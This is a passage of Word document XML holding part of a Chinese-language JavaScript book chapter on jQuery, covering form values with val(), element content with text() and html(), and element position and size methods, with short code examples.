    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意：</w:t>
      </w:r>
      <w:r>
        <w:t>hasClass()</w:t>
      </w:r>
      <w:r>
        <w:t>不如</w:t>
      </w:r>
      <w:r>
        <w:t>addClass()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>removeClass()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>toggleClass()</w:t>
      </w:r>
      <w:r>
        <w:t>灵活。</w:t>
      </w:r>
      <w:r>
        <w:t>hasClass()</w:t>
      </w:r>
      <w:r>
        <w:t>只能接受单个类名作为参数，并且不支持函数参数。当选中元素中的任意元素有指定</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>类时，</w:t>
      </w:r>
      <w:r>
        <w:t>hasClass()</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；如果任何元素都没有，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>19.1.2</w:t>
      </w:r>
      <w:r>
        <w:t>节描述的</w:t>
      </w:r>
      <w:r>
        <w:t>is()</w:t>
      </w:r>
      <w:r>
        <w:t>方法更灵活，可用来做同样</w:t>
      </w:r>
      <w:r>
        <w:t>的事。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的这些方法和</w:t>
      </w:r>
      <w:r>
        <w:t>16.5</w:t>
      </w:r>
      <w:r>
        <w:t>节讲的</w:t>
      </w:r>
      <w:r>
        <w:t>classList</w:t>
      </w:r>
      <w:r>
        <w:t>方法类似，只是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的方法可以工作在所有浏览器中，而不仅仅是那些支持</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5 classList</w:t>
      </w:r>
      <w:r>
        <w:t>属性的浏览器。此外，毫无疑问，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的方法可操作多个元素并支持链式调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="469" w:name="19_2_4_Huo_Qu_He_She_Zhi_HTMLBiao_Dan_Zh"/>
      <w:r>
        <w:t>19.2.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　获取和设置</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单值</w:t>
      </w:r>
      <w:bookmarkEnd w:id="469"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>val()</w:t>
      </w:r>
      <w:r>
        <w:t>方法用来设置和获取</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单元素的</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>属性，还可用于获取和设置复选框、单选按钮以及＜</w:t>
      </w:r>
      <w:r>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的选中状态：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("#surname").val()//</w:t>
      </w:r>
      <w:r>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:t>surname</w:t>
      </w:r>
      <w:r>
        <w:t>文本域的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("#usst</w:t>
      </w:r>
      <w:r>
        <w:t>ate").val()//</w:t>
      </w:r>
      <w:r>
        <w:t>从＜</w:t>
      </w:r>
      <w:r>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t>＞中获取单一值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("select#extras").val()//</w:t>
      </w:r>
      <w:r>
        <w:t>从＜</w:t>
      </w:r>
      <w:r>
        <w:t>select multiple</w:t>
      </w:r>
      <w:r>
        <w:t>＞中获取一组值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("input:radio[name=ship]:checked").val()//</w:t>
      </w:r>
      <w:r>
        <w:t>获取选中的单选按钮的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("#email").val("Invalid email address")//</w:t>
      </w:r>
      <w:r>
        <w:t>给文本域设置值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("input:checkbox").val(["opt1","opt2"])//</w:t>
      </w:r>
      <w:r>
        <w:t>选中带有这些名字或值的复选框</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("input:text"</w:t>
      </w:r>
      <w:r>
        <w:t>).val(function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>重置所有文本域为默认值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this.defaultValue;</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70" w:name="19_2_5_She_Zhi_He_Huo_Qu_Yuan_Su_Nei_Ron"/>
      <w:r>
        <w:t>19.2.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　设置和获取元素内容</w:t>
      </w:r>
      <w:bookmarkEnd w:id="470"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>text()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>html()</w:t>
      </w:r>
      <w:r>
        <w:t>方法用来获取和设置元素的纯文本或</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>内容。当不带参数调用时，</w:t>
      </w:r>
      <w:r>
        <w:t>text()</w:t>
      </w:r>
      <w:r>
        <w:t>返回所有匹配元素的所有子孙文本节点的纯文本内容。该方法甚至可以工作在不支持</w:t>
      </w:r>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>innerText</w:t>
      </w:r>
      <w:r>
        <w:t>属性（参考</w:t>
      </w:r>
      <w:r>
        <w:t>15.5.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）的浏览器中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果不带参数调用</w:t>
      </w:r>
      <w:r>
        <w:t>html()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，它会返回第一个匹配元素的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>内容。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>inner</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性来实现：</w:t>
      </w:r>
      <w:r>
        <w:t>x.html()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>x[0].innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>一样高效。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果传入字符串给</w:t>
      </w:r>
      <w:r>
        <w:t>text()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>html()</w:t>
      </w:r>
      <w:r>
        <w:t>，该字符串会用做该元素的纯文本或格式化的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文本内容，它会替换掉所有存在的内容。和</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>其他</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法一样，我们还可以传入函数，该函数用来计算出表示新内容的字符串：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var title=$("head title").text()//</w:t>
      </w:r>
      <w:r>
        <w:t>获取文档标题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var headline=$("h1").html()//</w:t>
      </w:r>
      <w:r>
        <w:t>获取第一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("h1").text(function(n</w:t>
      </w:r>
      <w:r>
        <w:t>,current){//</w:t>
      </w:r>
      <w:r>
        <w:t>给每一个标题添加章节号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return"§"+(n+1)+":"+current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71" w:name="19_2_6_Huo_Qu_He_She_Zhi_Yuan_Su_De_Wei_"/>
      <w:r>
        <w:t>19.2.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　获取和设置元素的位置高宽</w:t>
      </w:r>
      <w:bookmarkEnd w:id="471"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>15.8</w:t>
      </w:r>
      <w:r>
        <w:t>节中我们知道通过一些技巧可以正确获取元素的大小和位置，尤其当浏览器不支持</w:t>
      </w:r>
      <w:r>
        <w:t>getBoundingClientRect()</w:t>
      </w:r>
      <w:r>
        <w:t>（参考</w:t>
      </w:r>
      <w:r>
        <w:t>15.8.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）时。使用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以更简单地获取元素的大小和位置，并兼容所有浏览器。注意：本节描述的所有方法都是</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>，只有少部分可用做</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>offset()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以获取或设置元素的位置。该方法相对文档来计算位置值，返回一个对象，带有</w:t>
      </w:r>
      <w:r>
        <w:t>left</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>属性，用来表示</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标。如果传入带有这些属性的对象给该方法，它会给元素设置指定的位置。在有必要时，会设置</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:t>属性来使得元素可定位：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var elt=$("#sprite");//</w:t>
      </w:r>
      <w:r>
        <w:t>需要移动的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var position=elt.offset();//</w:t>
      </w:r>
      <w:r>
        <w:t>获取当前位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>position.top+=100;//</w:t>
      </w:r>
      <w:r>
        <w:t>改变</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elt.offset(position);//</w:t>
      </w:r>
      <w:r>
        <w:t>设置新位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>将所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素向右移动，移动的距离取决于它们在文档中的位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("h1").offset(function(index,curpos){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return{left:curpos.left+25*index,top:curpos.top};</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position()</w:t>
      </w:r>
      <w:r>
        <w:t>方法很像</w:t>
      </w:r>
      <w:r>
        <w:t>offset()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，但它只能用做</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>，它返回的元素位置是相对于其偏移父元素的，而不是相对于文档的。在</w:t>
      </w:r>
      <w:r>
        <w:t>15.8.5</w:t>
      </w:r>
      <w:r>
        <w:t>节中，我们知道任何元素都有一个</w:t>
      </w:r>
      <w:r>
        <w:t>offsetParent</w:t>
      </w:r>
      <w:r>
        <w:t>属性，其位置是相对的。定位元素总会当做其子孙元素的偏移父元素，但在某些浏览器下，也会把表格单元等其他元素当成偏移父元素。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>只会把定位元素作为偏移父元素，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>offsetParent()</w:t>
      </w:r>
      <w:r>
        <w:t>方法则会把每个元素映射到最近的定位祖先元素或＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。注意这些方法的名字并不很恰当：</w:t>
      </w:r>
      <w:r>
        <w:t>offs</w:t>
      </w:r>
      <w:r>
        <w:t>et()</w:t>
      </w:r>
      <w:r>
        <w:t>返回元素的绝对位置，用相对于文档的坐标来表示。而</w:t>
      </w:r>
      <w:r>
        <w:t>position()</w:t>
      </w:r>
      <w:r>
        <w:t>则返回相对于元素的</w:t>
      </w:r>
      <w:r>
        <w:t>offsetParent()</w:t>
      </w:r>
      <w:r>
        <w:t>的偏移量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用于获取元素宽度的</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>有</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个，获取高度的也有</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个。</w:t>
      </w:r>
      <w:r>
        <w:t>width()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>height()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回基本的宽度和高度，不包含内边距、边框和外边距。</w:t>
      </w:r>
      <w:r>
        <w:t>innerWidth()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>innerHeight()</w:t>
      </w:r>
      <w:r>
        <w:t>返回元素的宽度和高度，包含内边距的宽度和高度（</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>内</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>表示这些方法度量的是边框以内</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>的尺寸）。</w:t>
      </w:r>
      <w:r>
        <w:t>outerWidth()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>outerHeight()</w:t>
      </w:r>
      <w:r>
        <w:t>通常返回的是包含元素内边距和边框的尺寸。</w:t>
      </w:r>
      <w:r>
        <w:t>如果向两个方法中的任意一个传入</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>值，它们还可以返回包含元素外边距的尺寸。下面的代码展现了如何获取一个元素的</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>种不同宽度：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var body=$("body");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var contentWidth=body.width();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var paddingWidth=body.innerWidth();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var borderWidth=body.outerWidth();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var marginWidth=body.outerWidth(true);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var padding=paddingWidth-conte</w:t>
      </w:r>
      <w:r>
        <w:t>ntWidth;//</w:t>
      </w:r>
      <w:r>
        <w:t>左内边距和右内边距的和</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var borders=borderWidth-paddingWidth;//</w:t>
      </w:r>
      <w:r>
        <w:t>左边框和右边框的和</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var margins=marginWidth-borderWidth;//</w:t>
      </w:r>
      <w:r>
        <w:t>左外边距和右外边距的和</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>width()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>height()</w:t>
      </w:r>
      <w:r>
        <w:t>方法拥有其他</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个方法（以</w:t>
      </w:r>
      <w:r>
        <w:t>inner</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>outer</w:t>
      </w:r>
      <w:r>
        <w:t>开头的方法）所没有的特性。首先，当</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象的第一个元素是</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象时，</w:t>
      </w:r>
      <w:r>
        <w:t>width()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>height()</w:t>
      </w:r>
      <w:r>
        <w:t>返回的是窗口的视口大小或文档的整体尺寸。其他方法只适用于</w:t>
      </w:r>
      <w:r>
        <w:t>元素，不适用窗口和文档。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>另一个特性是</w:t>
      </w:r>
      <w:r>
        <w:t>width()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>height()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以是</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>也可以是</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>。如果传递值给这些方法，它们会给</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的每一个元素设置宽度或高度。（注意：不能给</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象设置宽度或高度。）如果传入数值，会把它当成单位为像素的尺寸。如</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>果传入字符串，会把它用做</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值，因此可以使用任何</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>单位。最后，和其他</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>类似，可以传入函数，用来计算要设置的宽度或高度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>width()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>height()</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>行为之间有个小的不对称。用做</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>时，这些方法返回元素的内容盒子的尺寸，不包括内边距、边框和外边距。用做</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>时，它们只是简单设置</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>属性。默认情况下，这些属性也指定内容盒子的大小。但是，如果一个元素的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS box-sizing</w:t>
      </w:r>
      <w:r>
        <w:t>属性（参考</w:t>
      </w:r>
      <w:r>
        <w:t>16.2.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）设置为</w:t>
      </w:r>
      <w:r>
        <w:t>border-box</w:t>
      </w:r>
      <w:r>
        <w:t>，则</w:t>
      </w:r>
      <w:r>
        <w:t>width()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>height()</w:t>
      </w:r>
      <w:r>
        <w:t>方法设置的尺寸包括内边距和边框。对于使用</w:t>
      </w:r>
      <w:r>
        <w:t>context-box</w:t>
      </w:r>
      <w:r>
        <w:t>作为盒模型的元素</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>，调用</w:t>
      </w:r>
      <w:r>
        <w:t>$(e</w:t>
      </w:r>
      <w:r>
